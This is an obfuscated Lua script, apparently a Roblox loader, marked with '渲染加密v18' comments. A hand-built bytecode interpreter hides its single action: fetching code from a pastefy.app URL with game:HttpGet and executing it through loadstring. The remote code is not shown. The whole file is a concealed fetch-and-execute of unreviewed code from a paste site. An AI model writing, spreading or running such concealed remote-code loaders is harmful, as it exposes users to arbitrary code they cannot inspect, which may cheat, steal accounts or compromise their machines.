local --[[渲染加密v18]] v0=tonumber;
local --[[渲染加密v18]] v1=string.byte;
local --[[渲染加密v18]] v2=string.char;
local --[[渲染加密v18]] v3=string.sub;
local --[[渲染加密v18]] v4=string.gsub;
local --[[渲染加密v18]] v5=string.rep;
local --[[渲染加密v18]] v6=table.concat;
local --[[渲染加密v18]] v7=table.insert;
local --[[渲染加密v18]] v8=math.ldexp;
local --[[渲染加密v18]] v9=getfenv or function() return _ENV;end ;
local --[[渲染加密v18]] v10=setmetatable;
local --[[渲染加密v18]] v11=pcall;
local --[[渲染加密v18]] v12=select;
local --[[渲染加密v18]] v13=unpack or table.unpack ;
local --[[渲染加密v18]] v14=tonumber;
local --[[渲染加密v18]] function v15(v16,v17,...) 
local --[[渲染加密v18]] v18=1;
local --[[渲染加密v18]] v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else 
local --[[渲染加密v18]] v81=0;
local --[[渲染加密v18]] v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then 
local --[[渲染加密v18]] v99=v5(v82,v19);v19=nil;return v99;else return v82;end break;end end end end);
local --[[渲染加密v18]] function v20(v31,v32,v33) if v33 then 
local --[[渲染加密v18]] v83=0 -(877 -(282 + 595)) ;
local --[[渲染加密v18]] v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-(1 -(1637 -(1523 + 114))))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v84-(v84%((834 + 94) -(214 + 713))) ;end end else 
local --[[渲染加密v18]] v85=2^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end 
local --[[渲染加密v18]] function v21() 
local --[[渲染加密v18]] v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end 
local --[[渲染加密v18]] function v22() 
local --[[渲染加密v18]] v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end 
local --[[渲染加密v18]] function v23() 
local --[[渲染加密v18]] v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (17 -13) ;return (v40 * (16777333 -(32 + 85))) + (v39 * (64226 + (2267 -(892 + 65)))) + (v38 * (57 + 199)) + v37 ;end 
local --[[渲染加密v18]] function v24() 
local --[[渲染加密v18]] v41=0 -0 ;
local --[[渲染加密v18]] v42;
local --[[渲染加密v18]] v43;
local --[[渲染加密v18]] v44;
local --[[渲染加密v18]] v45;
local --[[渲染加密v18]] v46;
local --[[渲染加密v18]] v47;while true do if (v41==(6 -(2 + 2))) then v46=v20(v43,39 -(10 + 8) ,56 -(910 -(261 + 624)) );v47=((v20(v43,474 -(416 + 26) )==(3 -2)) and  -(1 + 0)) or (1 -(0 -0)) ;v41=353 -(87 + (1343 -(1020 + 60))) ;end if ((433 -(44 + 386))==v41) then if (v46==((2909 -(630 + 793)) -(998 + 488))) then if (v45==(180 -(67 + 113))) then return v47 * (0 + 0) ;else v46=2 -1 ;v44=0 + 0 ;end elseif (v46==(2819 -(201 + 571))) then return ((v45==(0 -0)) and (v47 * ((953 -((2717 -1915) + 150))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1855 -832) ) * (v44 + (v45/((2 + (0 -0))^(1049 -(915 + 82))))) ;end if (v41==(2 -1)) then v44=1 + 0 ;v45=(v20(v43,1 -(0 + 0) ,1207 -(1069 + 118) ) * ((4 -2)^((237 -168) -37))) + v42 ;v41=1 + 1 ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 + 0 ;end end end 
local --[[渲染加密v18]] function v25(v48) 
local --[[渲染加密v18]] v49=1747 -(760 + 987) ;
local --[[渲染加密v18]] v50;
local --[[渲染加密v18]] v51;while true do if (v49==((3327 -(447 + 966)) -(1789 + 124))) then v50=v3(v16,v18,(v18 + v48) -((2099 -1332) -(745 + 21)) );v18=v18 + v48 ;v49=1 + 1 ;end if ((7 -(1821 -(1703 + 114)))==v49) then return v6(v51);end if (v49==(0 -0)) then v50=nil;if  not v48 then 
local --[[渲染加密v18]] v95=0 + 0 ;while true do if (v95==(0 + 0)) then v48=v23();if (v48==0) then return "";end break;end end end v49=1056 -(87 + 968) ;end if (v49==((709 -(376 + 325)) -6)) then v51={};for v89=(1 -0) + 0 , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=6 -3 ;end end end 
local --[[渲染加密v18]] v26=v23;
local --[[渲染加密v18]] function v27(...) return {...},v12("#",...);end 
local --[[渲染加密v18]] function v28() 
local --[[渲染加密v18]] v52=(function() return 1665 -(970 + 695) ;end)();
local --[[渲染加密v18]] v53=(function() return;end)();
local --[[渲染加密v18]] v54=(function() return;end)();
local --[[渲染加密v18]] v55=(function() return;end)();
local --[[渲染加密v18]] v56=(function() return;end)();
local --[[渲染加密v18]] v57=(function() return;end)();
local --[[渲染加密v18]] v58=(function() return;end)();
local --[[渲染加密v18]] v59=(function() return;end)();while true do 
local --[[渲染加密v18]] v66=(function() return 0 -0 ;end)();while true do if (v66~=0) then else if (v52~=(291 -(60 + 230))) then else 
local --[[渲染加密v18]] v96=(function() return 572 -(426 + 146) ;end)();while true do if (v96==(1990 -(582 + 1408))) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v96=(function() return 812 -(569 + 242) ;end)();end if (v96~=(2 -1)) then else v59=(function() return {};end)();for v143= #" ",v58 do 
local --[[渲染加密v18]] v144=(function() return 0 + 0 ;end)();
local --[[渲染加密v18]] v145=(function() return;end)();
local --[[渲染加密v18]] v146=(function() return;end)();while true do if (0~=v144) then else 
local --[[渲染加密v18]] v166=(function() return 0;end)();while true do if (v166==(1024 -(706 + 318))) then v145=(function() return v21();end)();v146=(function() return nil;end)();v166=(function() return 3 -2 ;end)();end if (v166~=(1 -0)) then else v144=(function() return 3 -2 ;end)();break;end end end if (v144==(1272 -(945 + 326))) then if (v145== #"[") then v146=(function() return v21()~=(1824 -(1195 + 629)) ;end)();elseif (v145==2) then v146=(function() return v24();end)();elseif (v145== #"-19") then v146=(function() return v25();end)();end v59[v143]=(function() return v146;end)();break;end end end v96=(function() return 2;end)();end if (v96==(2 + 0)) then v52=(function() return 2;end)();break;end end end if (v52~=(0 -0)) then else 
local --[[渲染加密v18]] v97=(function() return 241 -(187 + 54) ;end)();while true do if ((782 -(162 + 618))~=v97) then else v52=(function() return 1 + 0 ;end)();break;end if (v97~=(1 + 0)) then else v55=(function() return {};end)();v56=(function() return {};end)();v97=(function() return 2;end)();end if (v97~=(1500 -(1408 + 92))) then else v53=(function() return function(v150,v151,v152) 
local --[[渲染加密v18]] v153=(function() return 0 -0 ;end)();while true do if (v153~=(0 -0)) then else 
local --[[渲染加密v18]] v168=(function() return 0;end)();while true do if (v168~=0) then else v150[v151-#"}" ]=(function() return v152();end)();return v150,v151,v152;end end end end end;end)();v54=(function() return {};end)();v97=(function() return 1087 -(461 + 625) ;end)();end end end v66=(function() return 1289 -(993 + 295) ;end)();end if (v66~=1) then else if (v52==(1 + 1)) then v57[ #"gha"]=(function() return v21();end)();for v100= #",",v23() do 
local --[[渲染加密v18]] v101=(function() return v21();end)();if (v20(v101, #"<", #".")~=0) then else 
local --[[渲染加密v18]] v134=(function() return 1636 -(1373 + 263) ;end)();
local --[[渲染加密v18]] v135=(function() return;end)();
local --[[渲染加密v18]] v136=(function() return;end)();
local --[[渲染加密v18]] v137=(function() return;end)();while true do if (v134~=(1002 -(451 + 549))) then else if (v20(v136, #".", #".")~= #">") then else v137[2]=(function() return v59[v137[1 + 1 ]];end)();end if (v20(v136,2,1 + 1 )== #"|") then v137[ #"xxx"]=(function() return v59[v137[ #"gha"]];end)();end v134=(function() return 4 -1 ;end)();end if (v134~=(1 + 2)) then else if (v20(v136, #"gha", #"nil")== #"\\") then v137[ #"http"]=(function() return v59[v137[ #"0313"]];end)();end v54[v100]=(function() return v137;end)();break;end if (v134==1) then 
local --[[渲染加密v18]] v162=(function() return 0 -0 ;end)();while true do if (v162~=1) then else v134=(function() return 2;end)();break;end if (v162==(1384 -(746 + 638))) then v137=(function() return {v22(),v22(),nil,nil};end)();if (v135==(0 + 0)) then 
local --[[渲染加密v18]] v173=(function() return 0 + 0 ;end)();
local --[[渲染加密v18]] v174=(function() return;end)();while true do if (v173~=(0 -0)) then else v174=(function() return 341 -(218 + 123) ;end)();while true do if (v174~=0) then else v137[ #"nil"]=(function() return v22();end)();v137[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v135== #".") then v137[ #"91("]=(function() return v23();end)();elseif (v135==(1 + 1)) then v137[ #"-19"]=(function() return v23() -((1324 -(1249 + 73))^16) ;end)();elseif (v135~= #"gha") then else 
local --[[渲染加密v18]] v179=(function() return 1581 -(1535 + 46) ;end)();
local --[[渲染加密v18]] v180=(function() return;end)();while true do if ((0 + 0)~=v179) then else v180=(function() return 0 + 0 ;end)();while true do if (v180~=(560 -(306 + 254))) then else v137[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();v137[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v162=(function() return 1;end)();end end end if (v134==(0 + 0)) then 
local --[[渲染加密v18]] v163=(function() return 0 -0 ;end)();while true do if (v163==(1467 -(899 + 568))) then v135=(function() return v20(v101,2, #"nil");end)();v136=(function() return v20(v101, #"xnxx",6);end)();v163=(function() return 1 + 0 ;end)();end if (v163~=(2 -1)) then else v134=(function() return 1;end)();break;end end end end end end for v102= #"|",v23() do v55,v102,v28=(function() return v53(v55,v102,v28);end)();end return v57;end break;end end end end 
local --[[渲染加密v18]] function v29(v60,v61,v62) 
local --[[渲染加密v18]] v63=v60[115 -(4 + 110) ];
local --[[渲染加密v18]] v64=v60[586 -((1386 -(797 + 532)) + 527) ];
local --[[渲染加密v18]] v65=v60[1430 -(41 + 1386) ];return function(...) 
local --[[渲染加密v18]] v67=v63;
local --[[渲染加密v18]] v68=v64;
local --[[渲染加密v18]] v69=v65;
local --[[渲染加密v18]] v70=v27;
local --[[渲染加密v18]] v71=(76 + 28) -(6 + 11 + (201 -115)) ;
local --[[渲染加密v18]] v72= -(1 + 0);
local --[[渲染加密v18]] v73={};
local --[[渲染加密v18]] v74={...};
local --[[渲染加密v18]] v75=v12("#",...) -((1203 -(373 + 829)) -0) ;
local --[[渲染加密v18]] v76={};
local --[[渲染加密v18]] v77={};for v86=0 -0 ,v75 do if ((v86>=v69) or (1335>=3306)) then v73[v86-v69 ]=v74[v86 + (167 -(122 + (775 -(476 + 255)))) ];else v77[v86]=v74[v86 + 1 ];end end 
local --[[渲染加密v18]] v78=(v75-v69) + 1 ;
local --[[渲染加密v18]] v79;
local --[[渲染加密v18]] v80;while true do v79=v67[v71];v80=v79[1 -0 ];if (v80<=(9 -6)) then if (v80<=(1 + 0)) then if (v80==(0 + 0)) then do return;end else 
local --[[渲染加密v18]] v103=0 -0 ;
local --[[渲染加密v18]] v104;
local --[[渲染加密v18]] v105;while true do if ((4844>2253) and (v103==(65 -(30 + 35)))) then v104=v79[(1132 -(369 + 761)) + 0 + 0 ];v105=v77[v79[1260 -(1043 + 214) ]];v103=3 -2 ;end if ((452==452) and (v103==(1213 -(323 + 889)))) then v77[v104 + (2 -1) ]=v105;v77[v104]=v105[v79[584 -(361 + 219) ]];break;end end end elseif (v80==(322 -(53 + 267))) then v77[v79[1 + 1 ]]();else 
local --[[渲染加密v18]] v106=413 -(15 + 398) ;
local --[[渲染加密v18]] v107;while true do if ((v106==(982 -(18 + 964))) or (4557<2087)) then v107=v79[2];v77[v107]=v77[v107](v13(v77,v107 + (3 -2) ,v72));break;end end end elseif (v80<=((5 -2) + 2)) then if (v80==(3 + 1)) then v77[v79[852 -((37 -17) + 830) ]]=v62[v79[3 + 0 ]];else 
local --[[渲染加密v18]] v110;
local --[[渲染加密v18]] v111,v112;
local --[[渲染加密v18]] v113;
local --[[渲染加密v18]] v114;v77[v79[128 -((354 -(64 + 174)) + 10) ]]={};v71=v71 + 1 + 0 + 0 ;v79=v67[v71];v77[v79[740 -(542 + 196) ]]=v62[v79[3]];v71=v71 + (1 -0) ;v79=v67[v71];v77[v79[1 + 1 ]]=v62[v79[2 + 1 ]];v71=v71 + 1 + 0 ;v79=v67[v71];v114=v79[4 -2 ];v113=v77[v79[3]];v77[v114 + (2 -1) ]=v113;v77[v114]=v113[v79[1555 -(1126 + (629 -204)) ]];v71=v71 + (406 -(118 + 287)) ;v79=v67[v71];v77[v79[7 -5 ]]=v79[1124 -(118 + 1003) ];v71=v71 + ((338 -(144 + 192)) -1) ;v79=v67[v71];v114=v79[379 -(142 + 235) ];v111,v112=v70(v77[v114](v13(v77,v114 + 1 ,v79[(229 -(42 + 174)) -10 ])));v72=(v112 + v114) -1 ;v110=0 + 0 + 0 ;for v138=v114,v72 do 
local --[[渲染加密v18]] v139=0;while true do if (v139==(977 -(553 + 424))) then v110=v110 + (1 -(0 + 0)) ;v77[v138]=v111[v110];break;end end end v71=v71 + 1 + 0 ;v79=v67[v71];v114=v79[2];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 + 0 ;v79=v67[v71];do return;end end elseif (v80<=(4 + 1 + 1)) then 
local --[[渲染加密v18]] v130=v79[2];
local --[[渲染加密v18]] v131,v132=v70(v77[v130](v13(v77,v130 + 1 + 0 ,v79[2 + (1505 -(363 + 1141)) ])));v72=(v132 + v130) -(2 -1) ;
local --[[渲染加密v18]] v133=0 -0 ;for v140=v130,v72 do v133=v133 + (2 -1) ;v77[v140]=v131[v133];end elseif (v80>(3 + 4)) then v77[v79[2]]=v79[14 -11 ];else v77[v79[755 -(239 + 514) ]]={};end v71=v71 + (1581 -(1183 + 397)) + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031C3Q00682Q7470733A2Q2F706173746566792E612Q702F6D68676537492Q6B00094Q00057Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
